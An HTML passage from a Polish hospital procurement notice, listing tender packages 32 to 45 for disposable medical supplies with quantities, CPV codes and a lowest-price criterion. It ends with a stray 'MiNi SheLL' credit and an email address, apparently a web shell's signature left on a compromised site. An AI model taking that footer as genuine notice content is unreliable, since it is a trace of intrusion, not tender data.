<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Układ oddechowy noworodkowy jednorazowego użytku		szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Pakiet nr 33 - Rękawice do ochrony przed promieniami rentgenowskimi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękawice przeznaczone do ochrony przed promieniami rentgenowskimi		rozmiary: 6,5-9 	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Pakiet nr 34 - Akcesoria do pulsoksymetru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Czujnik steryny	dla noworodków o wadze 3 - 20 kg	szt.	96
2.	Opaski do czujnika do pulsoksymetru Y dla noworodków 	 	szt.	108
3.	Czujnik na palec dla dorosłych 	dla dorosłych powyżej 30 kg	szt.	144
4.	Czujnik SPO2  dla dorosłych 	 	szt.	2
5.	Czujnik SPO2 klips na ucho	 	szt.	2
6.	Czujnik jednorazowego użytku do pomiaru saturacji	rozmiar powyżej 10 kg masy pacjenta	szt.	10
		 rozmiar poniżej 10 kg masy pacjenta	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Pakiet nr 35 - Różny sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Fartuch  z grubej folii 	75 x 170 cm	szt.	800
2.	Jałowa szczotka 	dł.8-9,5cm szer. 5-5,5cm wys.4 cm	szt.	4280
3.	Kaczka jednorazowa  dla dorosłych z 	 	szt.	10
4.	Kieliszki do leków 	xxxxxxxxxxx	szt.	94880
5.	Koc -folia p/wstrząsowa 	 	szt.	67
6.	Lancety do testów skórnych 	 	szt.	2800
7.	Medyczny marker sterylny 	 	szt.	200
8.	Nakłuwacz	 	szt.	2200
9.	Okład żelowy	10 - 13 x 14-15	szt.	10
10.	Okład żelowy	13 x 25	szt.	30
11.	Okład żelowy	20 - 21 x 28 - 38	szt.	14
12.	Opaska do identyfikacji dorosłych	 	szt.	16300
13.	Opaska do identyfikacji noworodków 	xxxxxxxxxxx	szt.	4900
14.	Pojemnik do dobowej zbiórki moczu 	2,5 l	szt.	26
15.	Pojemnik na kał z łopatką	20 ml - 30 ml	szt.	700
16.	Pojemnik plastikowy na mocz 	 	szt.	19370
17.	Pojemnik plastikowy na mocz 	 	szt.	991
18.	Rozcinacz do zaciskacza do pępowiny .	 	szt.	10
19.	Szpatułki drewniane 	xxxxxxxxxxx	op.	1
20.	Szpatułki drewniane 	xxxxxxxxxxx	op.	149
21.	Szyna do palców	400 x 20	szt.	70
22.	Tubusy  z obturatorem zaokrąglonym 	85 x 20mm	szt.	25
23.	Tubusy do rektoskopu  z obturatorem 	250 x 20mm	szt.	25
24.	Zestaw podstawowy do nadłonowego drenażu pęcherzyka	Igła 5,6mm długość igły 120mm, cewnik CH12 długość 400mm, znaczniki 170/210mm	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Pakiet nr 36 -  Rurki krtaniowe jednorazowe i wielorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łącznik Y wielokrotny z portem do kontroli temperatury, 	 	szt.	1
2.	Rurka krtaniowa LT	Nr 1   5-12 kg	szt	1
3.	Rurka krtaniowa LT- D 	Nr 3   do 155 cm wzrostu	szt	9
4.	Rurka krtaniowa LT- D 	Nr 4   od 155 cm - 180 cm wzrostu	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Pakiet nr 37 - Rurki do podawania surfaktantu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dwukanałowa dotchawicza rurka do podawania surfaktantu		Nr 2,0	szt.	2
			Nr 2,5	szt.	3
			Nr 3,0	szt.	5
			Nr 3,5	szt.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Pakiet nr 38 - Zestaw do toalety jamy ustnej i pobierania próbek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do pobierania próbek z drzewa oskrzelowego,		zest.	70
2.	Zestaw do toalety jamy ustnej		zest.	642.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Pakiet nr 39 - Igła do skleroterapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Igła do skleroterapii		szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Pakiet nr 40- Igły do systemu dostępu doszpikowego EZ-IO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła do systemu dostępu doszpikowego EZ - IO (dł 25mm)	szt.	10
2	Igła do systemu dostępu doszpikowego EZ - IO (dł 15mm)	I	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Pakiet nr 41 - Igła do stymulatora HNS 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Igła do stymulatora HNS 12		szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Pakiet nr 42 - Pojemniki histopatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Pojemniki jednorazowe polietylenowe histopatologiczne		500 ml 	szt.	315
			1000 ml	szt.	165
			2000 ml	szt.	30
			3000 ml	szt.	20
			5000 ml	szt.	10
			10 000 ml	szt.	2
			20 ml	szt.	1400
			35 ml	szt.	825
			50 ml	szt.	420
			100 ml	szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Pakiet nr 43 - Naczynia sanitarne jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Basen jednorazowy płaski 	pojemność 1,3 litra	szt.	100
2.	Podstawa basenu płaskiego 	x	szt.	2
3.	Kaczka męska jednorazowa 	x	szt.	20
4.	Miska jednorazowa do mycia *	pojemność ok. 3 litry	szt.	100
5.	Miski nerkowate jednorazowe	poj 700 ml	szt.	13520
6.	Miska jednorazowa do mycia 	pojemność minimum 3 litry	szt.	1700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Pakiet nr 44 - Dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Dren łączący do kontrolowanego odsysania 	szt	256.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Pakiet nr 45 - Sterylne akcesoria na blok operacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sterylny jednorazowy uchwyt na noże chirurgiczne 	 	szt	30
2.	Sterylny jednorazowy pojemnik do liczenia igieł i ostrzy chirurgicznych	 	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com